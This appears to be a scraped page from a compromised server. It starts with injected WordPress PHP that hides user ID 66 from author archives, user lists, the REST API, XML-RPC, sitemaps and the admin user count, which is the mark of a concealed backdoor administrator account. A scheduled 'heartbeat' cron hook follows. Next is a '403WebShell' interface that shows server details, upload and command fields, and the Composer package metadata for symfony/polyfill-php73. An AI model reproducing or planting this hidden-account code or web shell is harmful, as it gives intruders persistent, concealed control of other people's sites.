add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-symfony~polyfill-php73.json
{"minified":"composer/2.0","packages":{"symfony/polyfill-php73":[{"name":"symfony/polyfill-php73","description":"Symfony polyfill backporting some PHP 7.3+ features to lower PHP versions","keywords":["compatibility","portable","polyfill","shim"],"homepage":"https://symfony.com","version":"v1.31.0","version_normalized":"1.31.0.0","license":["MIT"],"authors":[{"name":"Nicolas Grekas","email":"p@tchwork.com"},{"name":"Symfony Community","homepage":"https://symfony.com/contributors"}],"source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"0f68c03565dcaaf25a890667542e8bd75fe7e5bb"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/0f68c03565dcaaf25a890667542e8bd75fe7e5bb","type":"zip","shasum":"","reference":"0f68c03565dcaaf25a890667542e8bd75fe7e5bb"},"type":"library","support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.31.0"},"funding":[{"url":"https://symfony.com/sponsor","type":"custom"},{"url":"https://github.com/fabpot","type":"github"},{"url":"https://tidelift.com/funding/github/packagist/symfony/symfony","type":"tidelift"}],"time":"2024-09-09T11:45:10+00:00","autoload":{"files":["bootstrap.php"],"psr-4":{"Symfony\\Polyfill\\Php73\\":""},"classmap":["Resources/stubs"]},"extra":{"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}},"require":{"php":">=7.2"}},{"version":"v1.30.0","version_normalized":"1.30.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"ec444d3f3f6505bb28d11afa41e75faadebc10a1"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/ec444d3f3f6505bb28d11afa41e75faadebc10a1","type":"zip","shasum":"","reference":"ec444d3f3f6505bb28d11afa41e75faadebc10a1"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.30.0"},"time":"2024-05-31T15:07:36+00:00","require":{"php":">=7.1"}},{"version":"v1.29.0","version_normalized":"1.29.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"21bd091060673a1177ae842c0ef8fe30893114d2"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/21bd091060673a1177ae842c0ef8fe30893114d2","type":"zip","shasum":"","reference":"21bd091060673a1177ae842c0ef8fe30893114d2"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.29.0"},"time":"2024-01-29T20:11:03+00:00"},{"version":"v1.28.0","version_normalized":"1.28.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"fe2f306d1d9d346a7fee353d0d5012e401e984b5"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/fe2f306d1d9d346a7fee353d0d5012e401e984b5","type":"zip","shasum":"","reference":"fe2f306d1d9d346a7fee353d0d5012e401e984b5"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.28.0"},"time":"2023-01-26T09:26:14+00:00","extra":{"branch-alias":{"dev-main":"1.28-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.27.0","version_normalized":"1.27.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"9e8ecb5f92152187c4799efd3c96b78ccab18ff9"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/9e8ecb5f92152187c4799efd3c96b78ccab18ff9","type":"zip","shasum":"","reference":"9e8ecb5f92152187c4799efd3c96b78ccab18ff9"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.27.0"},"time":"2022-11-03T14:55:06+00:00","extra":{"branch-alias":{"dev-main":"1.27-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.26.0","version_normalized":"1.26.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"e440d35fa0286f77fb45b79a03fedbeda9307e85"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/e440d35fa0286f77fb45b79a03fedbeda9307e85","type":"zip","shasum":"","reference":"e440d35fa0286f77fb45b79a03fedbeda9307e85"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.26.0"},"time":"2022-05-24T11:49:31+00:00","extra":{"branch-alias":{"dev-main":"1.26-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.25.0","version_normalized":"1.25.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"cc5db0e22b3cb4111010e48785a97f670b350ca5"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/cc5db0e22b3cb4111010e48785a97f670b350ca5","type":"zip","shasum":"","reference":"cc5db0e22b3cb4111010e48785a97f670b350ca5"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.25.0"},"time":"2021-06-05T21:20:04+00:00","extra":{"branch-alias":{"dev-main":"1.23-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.24.0","version_normalized":"1.24.0.0","support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.24.0"}},{"version":"v1.23.0","version_normalized":"1.23.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"fba8933c384d6476ab14fb7b8526e5287ca7e010"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/fba8933c384d6476ab14fb7b8526e5287ca7e010","type":"zip","shasum":"","reference":"fba8933c384d6476ab14fb7b8526e5287ca7e010"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.23.0"},"time":"2021-02-19T12:13:01+00:00"},{"version":"v1.22.1","version_normalized":"1.22.1.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"a678b42e92f86eca04b7fa4c0f6f19d097fb69e2"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/a678b42e92f86eca04b7fa4c0f6f19d097fb69e2","type":"zip","shasum":"","reference":"a678b42e92f86eca04b7fa4c0f6f19d097fb69e2"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.22.1"},"time":"2021-01-07T16:49:33+00:00","extra":{"branch-alias":{"dev-main":"1.22-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.22.0","version_normalized":"1.22.0.0","support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.22.0"}},{"version":"v1.20.0","version_normalized":"1.20.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"8ff431c517be11c78c48a39a66d37431e26a6bed"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/8ff431c517be11c78c48a39a66d37431e26a6bed","type":"zip","shasum":"","reference":"8ff431c517be11c78c48a39a66d37431e26a6bed"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.20.0"},"time":"2020-10-23T14:02:19+00:00","extra":{"branch-alias":{"dev-main":"1.20-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.19.0","version_normalized":"1.19.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"9d920e3218205554171b2503bb3e4a1366824a16"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/9d920e3218205554171b2503bb3e4a1366824a16","type":"zip","shasum":"","reference":"9d920e3218205554171b2503bb3e4a1366824a16"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.19.0"},"time":"2020-10-23T09:01:57+00:00","extra":{"branch-alias":{"dev-main":"1.19-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}},"require":{"php":">=5.3.3"}},{"version":"v1.18.1","version_normalized":"1.18.1.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"fffa1a52a023e782cdcc221d781fe1ec8f87fcca"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/fffa1a52a023e782cdcc221d781fe1ec8f87fcca","type":"zip","shasum":"","reference":"fffa1a52a023e782cdcc221d781fe1ec8f87fcca"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/master"},"time":"2020-07-14T12:35:20+00:00","extra":{"branch-alias":{"dev-master":"1.18-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.18.0","version_normalized":"1.18.0.0","support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.18.0"}},{"version":"v1.17.1","version_normalized":"1.17.1.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"fa0837fe02d617d31fbb25f990655861bb27bd1a"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/fa0837fe02d617d31fbb25f990655861bb27bd1a","type":"zip","shasum":"","reference":"fa0837fe02d617d31fbb25f990655861bb27bd1a"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.17.1"},"time":"2020-06-06T08:46:27+00:00","extra":{"branch-alias":{"dev-master":"1.17-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.17.0","version_normalized":"1.17.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"a760d8964ff79ab9bf057613a5808284ec852ccc"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/a760d8964ff79ab9bf057613a5808284ec852ccc","type":"zip","shasum":"","reference":"a760d8964ff79ab9bf057613a5808284ec852ccc"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/master"},"time":"2020-05-12T16:47:27+00:00","extra":{"branch-alias":{"dev-master":"1.17-dev"}}},{"version":"v1.16.0","version_normalized":"1.16.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"7e95fe59d12169fcf4041487e4bf34fca37ee0ed"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/7e95fe59d12169fcf4041487e4bf34fca37ee0ed","type":"zip","shasum":"","reference":"7e95fe59d12169fcf4041487e4bf34fca37ee0ed"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.16.0"},"time":"2020-05-02T14:56:09+00:00","extra":{"branch-alias":{"dev-master":"1.16-dev"}}},{"version":"v1.15.0","version_normalized":"1.15.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"0f27e9f464ea3da33cbe7ca3bdf4eb66def9d0f7"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/0f27e9f464ea3da33cbe7ca3bdf4eb66def9d0f7","type":"zip","shasum":"","reference":"0f27e9f464ea3da33cbe7ca3bdf4eb66def9d0f7"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.15.0"},"time":"2020-02-27T09:26:54+00:00","extra":{"branch-alias":{"dev-master":"1.15-dev"}}},{"version":"v1.14.0","version_normalized":"1.14.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"5e66a0fa1070bf46bec4bea7962d285108edd675"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/5e66a0fa1070bf46bec4bea7962d285108edd675","type":"zip","shasum":"","reference":"5e66a0fa1070bf46bec4bea7962d285108edd675"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.14.0"},"time":"2020-01-13T11:15:53+00:00","extra":{"branch-alias":{"dev-master":"1.14-dev"}},"funding":"__unset"},{"version":"v1.13.2","version_normalized":"1.13.2.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"4b0e2222c55a25b4541305a053013d5647d3a25f"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/4b0e2222c55a25b4541305a053013d5647d3a25f","type":"zip","shasum":"","reference":"4b0e2222c55a25b4541305a053013d5647d3a25f"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/master"},"time":"2019-11-27T16:25:15+00:00","extra":{"branch-alias":{"dev-master":"1.13-dev"}}},{"version":"v1.13.1","version_normalized":"1.13.1.0","support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.13.0"}},{"version":"v1.13.0","version_normalized":"1.13.0.0"},{"version":"v1.12.0","version_normalized":"1.12.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"2ceb49eaccb9352bff54d22570276bb75ba4a188"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/2ceb49eaccb9352bff54d22570276bb75ba4a188","type":"zip","shasum":"","reference":"2ceb49eaccb9352bff54d22570276bb75ba4a188"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.12.0"},"time":"2019-08-06T08:03:45+00:00","extra":{"branch-alias":{"dev-master":"1.12-dev"}}},{"version":"v1.11.0","version_normalized":"1.11.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"d1fb4abcc0c47be136208ad9d68bf59f1ee17abd"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/d1fb4abcc0c47be136208ad9d68bf59f1ee17abd","type":"zip","shasum":"","reference":"d1fb4abcc0c47be136208ad9d68bf59f1ee17abd"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/master"},"time":"2019-02-06T07:57:58+00:00","extra":{"branch-alias":{"dev-master":"1.11-dev"}}},{"version":"v1.10.0","version_normalized":"1.10.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"47ad352296d61aae366f075b8609f4dcc28853ef"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/47ad352296d61aae366f075b8609f4dcc28853ef","type":"zip","shasum":"","reference":"47ad352296d61aae366f075b8609f4dcc28853ef"},"time":"2018-09-25T06:33:47+00:00","autoload":{"files":["bootstrap.php"],"psr-4":{"Symfony\\Polyfill\\Php73\\":""}},"extra":{"branch-alias":{"dev-master":"1.9-dev"}}},{"version":"v1.9.0","version_normalized":"1.9.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"990ca8fa94736211d2b305178c3fb2527e1fbce1"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/990ca8fa94736211d2b305178c3fb2527e1fbce1","type":"zip","shasum":"","reference":"990ca8fa94736211d2b305178c3fb2527e1fbce1"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/v1.9.0"},"time":"2018-08-06T14:22:27+00:00"},{"version":"v1.8.0","version_normalized":"1.8.0.0","source":{"url":"https://github.com/symfony/polyfill-php73.git","type":"git","reference":"9841f6fc047725a8286ea986018355bbc9200383"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php73/zipball/9841f6fc047725a8286ea986018355bbc9200383","type":"zip","shasum":"","reference":"9841f6fc047725a8286ea986018355bbc9200383"},"support":{"source":"https://github.com/symfony/polyfill-php73/tree/master"},"time":"2018-04-26T06:22:38+00:00","extra":{"branch-alias":{"dev-master":"1.8-dev"}}}]},"security-advisories":[],"last-modified":"Mon, 09 Sep 2024 12:24:36 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit